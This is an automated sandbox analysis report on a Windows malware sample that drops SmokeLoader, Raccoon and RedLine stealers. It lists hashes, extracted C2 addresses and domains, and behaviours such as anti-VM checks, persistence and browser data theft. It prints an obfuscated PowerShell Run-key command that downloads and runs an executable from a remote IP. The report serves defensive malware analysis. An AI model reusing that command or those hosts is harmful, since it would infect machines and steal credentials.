Analysis
-
max time kernel
151s -
max time network
158s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
11-08-2021 20:40
Static task
static1
Behavioral task
behavioral1
Sample
d4537efd24d9b886648bd32b6ce4da99.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
d4537efd24d9b886648bd32b6ce4da99.exe
Resource
win10v20210408
General
-
Target
d4537efd24d9b886648bd32b6ce4da99.exe
-
Size
207KB
-
MD5
d4537efd24d9b886648bd32b6ce4da99
-
SHA1
1a014d098b8ef7ecef5ec124ddef0030c42da509
-
SHA256
5d372a19bbdae072e4fb4ff9deded30dbb40f4a74b54fbf77888a1523e864129
-
SHA512
e0db39cd1165f6d34e33f4a31e71a1ff69f48cf3baf291cf873b91954e608b89dd8a89a4f1cafa279936cf22abf4e901290816d649bcbc143e7977618d6e30e4
Malware Config
Extracted
http://91.241.19.52/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
2ca2376c561d1af7f8b9e6f3256b06220a3db187
-
url4cnc
https://telete.in/johnyes13
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Signatures
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4924 1768 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4224 1768 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4964 1768 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5008 1768 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5036 1768 schtasks.exe -
Raccoon Stealer Payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/3648-191-0x0000000000400000-0x0000000002CB0000-memory.dmp family_raccoon behavioral2/memory/3648-193-0x00000000048B0000-0x0000000004941000-memory.dmp family_raccoon behavioral2/memory/4072-194-0x0000000000400000-0x0000000002CB1000-memory.dmp family_raccoon behavioral2/memory/4072-188-0x00000000049B0000-0x0000000004A43000-memory.dmp family_raccoon behavioral2/memory/4128-243-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon behavioral2/memory/4128-248-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\B702.exe family_redline C:\Users\Admin\AppData\Local\Temp\B702.exe family_redline C:\Users\Admin\AppData\Local\Temp\CCFE.exe family_redline C:\Users\Admin\AppData\Local\Temp\CCFE.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 3444 created 4072 3444 WerFault.exe CFDE.exe PID 4004 created 3648 4004 WerFault.exe D26F.exe -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 35 4244 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 60 IoCs
Processes:
ADCA.exeADCA.tmpB702.exeADCA.exeADCA.tmpBB97.exeBE96.exefsucenter.exeCCFE.exeCFDE.exeD26F.exeRuntimebroker.exeBE96.exeDatabase.exeDatabase.exeinstall.exeHostData.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeinstall.exeDatabase.exeDatabase.exeinstall.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exepid process 212 ADCA.exe 1868 ADCA.tmp 2084 B702.exe 2648 ADCA.exe 2100 ADCA.tmp 1808 BB97.exe 852 BE96.exe 1816 fsucenter.exe 2580 CCFE.exe 4072 CFDE.exe 3648 D26F.exe 3492 Runtimebroker.exe 4128 BE96.exe 3692 Database.exe 4764 Database.exe 4784 install.exe 4840 HostData.exe 4856 Database.exe 4908 Database.exe 4088 Database.exe 5080 Database.exe 4104 Database.exe 3892 Database.exe 4216 Database.exe 2324 Database.exe 4112 Database.exe 4308 Database.exe 2156 Database.exe 2580 Database.exe 4368 Database.exe 2640 Database.exe 3656 Database.exe 4512 Database.exe 4552 Database.exe 4500 Database.exe 4620 Database.exe 3108 Database.exe 2892 Database.exe 4740 Database.exe 4812 install.exe 4900 Database.exe 5028 Database.exe 5056 install.exe 5096 Database.exe 4104 Database.exe 892 Database.exe 4476 Database.exe 4280 Database.exe 4412 Database.exe 3896 Database.exe 4248 Database.exe 4180 Database.exe 1200 Database.exe 4128 Database.exe 2076 Database.exe 4284 Database.exe 1868 Database.exe 852 Database.exe 2252 Database.exe 2156 Database.exe -
Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeB702.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion B702.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion B702.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe -
Deletes itself 1 IoCs
Processes:
pid process 3000 -
Drops startup file 1 IoCs
Processes:
Runtimebroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe -
Loads dropped DLL 1 IoCs
Processes:
fsucenter.exepid process 1816 fsucenter.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\B702.exe themida C:\Users\Admin\AppData\Local\Temp\B702.exe themida behavioral2/memory/2084-141-0x0000000000A80000-0x0000000000A81000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\CCFE.exe themida C:\Users\Admin\AppData\Local\Temp\CCFE.exe themida behavioral2/memory/2580-178-0x0000000001110000-0x0000000001111000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
install.exepowershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\explorer.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\DtcInstall\\explorer.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\B702 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\B702\\B702.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\SysWOW64\\twinui\\explorer.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Boot\\nb-NO\\smss.exe\"" install.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Database.exeB702.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeCCFE.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA B702.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CCFE.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 2 IoCs
Processes:
install.exedescription ioc process File created C:\Windows\SysWOW64\twinui\explorer.exe install.exe File created C:\Windows\SysWOW64\twinui\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
B702.exeCCFE.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exepid process 2084 B702.exe 2580 CCFE.exe 3692 Database.exe 3692 Database.exe 3692 Database.exe 4764 Database.exe 4764 Database.exe 4764 Database.exe 4856 Database.exe 4856 Database.exe 4856 Database.exe 4908 Database.exe 4908 Database.exe 4908 Database.exe 4088 Database.exe 4088 Database.exe 4088 Database.exe 5080 Database.exe 5080 Database.exe 5080 Database.exe 4104 Database.exe 4104 Database.exe 4104 Database.exe 3892 Database.exe 3892 Database.exe 3892 Database.exe 4216 Database.exe 4216 Database.exe 4216 Database.exe 2324 Database.exe 2324 Database.exe 2324 Database.exe 4112 Database.exe 4112 Database.exe 4112 Database.exe 4308 Database.exe 4308 Database.exe 4308 Database.exe 2156 Database.exe 2156 Database.exe 2156 Database.exe 2580 Database.exe 2580 Database.exe 2580 Database.exe 4368 Database.exe 4368 Database.exe 4368 Database.exe 2640 Database.exe 2640 Database.exe 2640 Database.exe 3656 Database.exe 3656 Database.exe 3656 Database.exe 4512 Database.exe 4512 Database.exe 4512 Database.exe 4552 Database.exe 4552 Database.exe 4552 Database.exe 4500 Database.exe 4500 Database.exe 4500 Database.exe 4620 Database.exe 4620 Database.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
d4537efd24d9b886648bd32b6ce4da99.exeBE96.exeinstall.exedescription pid process target process PID 3492 set thread context of 1520 3492 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe PID 852 set thread context of 4128 852 BE96.exe BE96.exe PID 4784 set thread context of 4812 4784 install.exe install.exe -
Drops file in Program Files directory 3 IoCs
Processes:
install.exedescription ioc process File created C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe install.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe install.exe File created C:\Program Files\Windows Security\BrowserCore\en-US\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 install.exe -
Drops file in Windows directory 2 IoCs
Processes:
install.exedescription ioc process File created C:\Windows\DtcInstall\explorer.exe install.exe File created C:\Windows\DtcInstall\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 23 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1624 1808 WerFault.exe BB97.exe 2220 1808 WerFault.exe BB97.exe 3928 1808 WerFault.exe BB97.exe 3248 1808 WerFault.exe BB97.exe 204 1808 WerFault.exe BB97.exe 208 1808 WerFault.exe BB97.exe 1788 4072 WerFault.exe CFDE.exe 3604 3648 WerFault.exe D26F.exe 3644 4072 WerFault.exe CFDE.exe 2648 3648 WerFault.exe D26F.exe 3984 4072 WerFault.exe CFDE.exe 3936 3648 WerFault.exe D26F.exe 2200 3492 WerFault.exe Runtimebroker.exe 3476 4072 WerFault.exe CFDE.exe 4016 3648 WerFault.exe D26F.exe 2220 3492 WerFault.exe Runtimebroker.exe 3444 4072 WerFault.exe CFDE.exe 4004 3648 WerFault.exe D26F.exe 2636 3492 WerFault.exe Runtimebroker.exe 3612 3492 WerFault.exe Runtimebroker.exe 1624 3492 WerFault.exe Runtimebroker.exe 2200 3492 WerFault.exe Runtimebroker.exe 208 3492 WerFault.exe Runtimebroker.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
d4537efd24d9b886648bd32b6ce4da99.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d4537efd24d9b886648bd32b6ce4da99.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d4537efd24d9b886648bd32b6ce4da99.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d4537efd24d9b886648bd32b6ce4da99.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4224 schtasks.exe 4964 schtasks.exe 5008 schtasks.exe 5036 schtasks.exe 4924 schtasks.exe -
Processes:
fsucenter.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 fsucenter.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b